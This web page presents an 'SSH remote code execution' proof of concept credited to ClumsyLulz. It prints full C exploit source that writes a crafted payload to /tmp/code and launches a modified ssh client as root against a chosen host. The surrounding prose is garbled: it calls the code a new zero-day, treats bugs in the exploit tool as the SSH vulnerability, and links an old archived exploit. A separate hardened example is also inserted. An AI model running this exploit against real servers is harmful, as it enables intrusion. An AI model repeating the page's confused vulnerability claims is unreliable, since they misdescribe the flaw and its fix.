
ssh exploit poc by ClumsyLulz

A new zero-day vulnerability in SSH has been discovered, which could allow attackers to remotely execute code on vulnerable systems. The vulnerability was discovered in a C program created by ClumsyLulz, which was designed to generate a packet to be sent to a server via the SSH protocol. Taylor Christian Newsome discovered several issues with the code that can be exploited to achieve remote code execution.

The main issue with the code is a heap buffer overflow: malloc allocates only 28 bytes for the buffer, but 29 bytes are written to it. This can lead to memory corruption or a segmentation fault. Additionally, the return address calculation is incorrect: the program uses the value of the packet length instead of the buffer size to determine the return address, resulting in an incorrect value.

The program also has a format string issue in the printf call that prints the return address, which can lead to undefined behavior. Furthermore, the program does not check the return values of the “open” and “write” calls, which can result in data loss or in the buffer silently failing to be written to the file. Finally, the program never frees the memory allocated for the “buffer” and “ssh” pointers, which leads to memory leaks.

To address these issues, security experts recommend increasing the size of the buffer allocation to 29 bytes, correcting the return address calculation by using the buffer size instead of the packet length, and correcting the format string in the printf statement for the return address. The program should also check the return values of the “open” and “write” functions, and handle errors appropriately. The memory allocated for the “buffer” and “ssh” pointers should also be freed, and the “system” function should be replaced with a safer alternative, such as “execvp”, to avoid potential security vulnerabilities.
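A hardened version of the packet-building and file-writing steps, as an added example that is not the page's or ClumsyLulz's code: it keeps the record to a fixed 28 bytes of 32-bit words, rejects an undersized buffer, and checks the open()/write()/close() results the original ignores. It assumes the intended on-disk layout is seven big-endian 32-bit words (what the original byte-swap loop produces on a 32-bit little-endian host); the execvp() replacement for system() is not shown.

```c
#include <stdio.h>
#include <stdint.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/stat.h>

#define PKT_WORDS 7
#define PKT_BYTES (PKT_WORDS * 4)  /* 28: the size the original malloc(28) assumes */

/* Bytes the original's seven "unsigned long" stores actually touch on this
 * host: 28 on a 32-bit build, 56 on LP64, which overruns the 28-byte buffer. */
size_t original_bytes_stored(void)
{
    return PKT_WORDS * sizeof(unsigned long);
}

/* Serialise seven 32-bit words big-endian; -1 if the buffer is missing or too small. */
int build_packet(const uint32_t words[PKT_WORDS], unsigned char *out, size_t out_len)
{
    if (out == NULL || out_len < PKT_BYTES) return -1;
    for (int i = 0; i < PKT_WORDS; i++) {
        out[4 * i]     = (unsigned char)(words[i] >> 24);
        out[4 * i + 1] = (unsigned char)(words[i] >> 16);
        out[4 * i + 2] = (unsigned char)(words[i] >> 8);
        out[4 * i + 3] = (unsigned char)(words[i]);
    }
    return 0;
}

/* Write the record to path, checking the calls the original ignores; -1 on any failure. */
int write_packet(const char *path, const unsigned char *pkt, size_t len)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, S_IRUSR | S_IWUSR);
    if (fd < 0) return -1;
    ssize_t n = write(fd, pkt, len);
    int rc = (n >= 0 && (size_t)n == len) ? 0 : -1;
    if (close(fd) != 0) rc = -1;
    return rc;
}

int main(void)
{
    uint32_t words[PKT_WORDS] = {0x01020304, 0, 0, 0, 16520, 100, 4}; /* constructed sample values */
    unsigned char pkt[PKT_BYTES];
    if (build_packet(words, pkt, sizeof pkt) != 0 || write_packet("./packet.bin", pkt, sizeof pkt) != 0)
        return 1;
    printf("wrote %zu bytes; the original code stores %zu\n", sizeof pkt, original_bytes_stored());
    return 0;
}
```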

It is important for companies and organizations that use SSH to be aware of this vulnerability and take steps to mitigate the risk. It is recommended that software developers and system administrators update their software and apply any necessary patches. In addition, users should be cautious when accessing untrusted websites or emails, as they could be used to launch attacks that exploit this vulnerability. As always, keeping software up to date and using best practices for cybersecurity can go a long way in protecting against potential vulnerabilities.

https://github.com/SleepTheGod/SSH-Remote-Code-Execution/blob/main/Exploit.cpp

/* Made by Taylor Newsome UwU Rarw X3 <3 */
/* <Twitter.com/Clumsylulz> */
/* Remote Code Execution Exploit for SSH */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <string.h>
/* Path to modified ssh */
#define PATH_SSH "./ssh"
int main(int argc, char *argv[])
{
    int f;
    int port;
    unsigned long addr, *ptr;
    char *buffer, *aux, ch, *ssh;
    int i;
    if (argc < 8)
    {
        printf("\nUsage: %s <saved eip> <count> <packet length> <username length> <host> <port> <h(i)>\n\n", argv[0]);
        fflush(stdout);
        exit(0);
    }
    port = atoi(argv[6]);
    buffer = (char *) malloc(28);
    ptr = (unsigned long *) buffer;
    *(ptr++) = 1543007393 + strtoul(argv[1], 0, 10);
    *(ptr++) = 0;
    *(ptr++) = strtoul(argv[7], 0, 10);
    *(ptr++) = 0;
    *(ptr++) = 16520 + strtoul(argv[2], 0, 10);
    *(ptr++) = strtoul(argv[3], 0, 10);
    *(ptr++) = strtoul(argv[4], 0, 10);
    for (i = 0; i < 28; i += 4)
    {
        aux = buffer + i;
        ch = *aux;
        *aux = *(aux + 3);
        *(aux + 3) = ch;
        ch = *(aux + 1);
        *(aux + 1) = *(aux + 2);
        *(aux + 2) = ch;
    }
    printf("\nSaved Eip: &h + %u", 1543007393 + strtoul(argv[1], 0, 10));
    printf("\nReturn Address: 0x%lx", (16520 + strtoul(argv[2], 0, 10))/8);
    printf("\nPacket Length: %u", (strtoul(argv[3], 0, 10) + 8) & ~7);
    printf("\nUsername Length: %u\n\n", strtoul(argv[4], 0, 10));
    fflush(stdout);
    f = open("/tmp/code", O_RDWR | O_CREAT, S_IRWXU);
    write(f, buffer, 28);
    close(f);
    ssh = (char *) malloc(strlen(PATH_SSH) + 100 + strlen(argv[5]));
    strcpy(ssh, PATH_SSH);
    sprintf(ssh + strlen(PATH_SSH), " -p %i -v -l root %s", port, argv[5]);
    printf("%s\n", ssh);
    system(ssh);
    exit(0);
}

Archaeology can be found here:

https://www.exploit-db.com/exploits/20617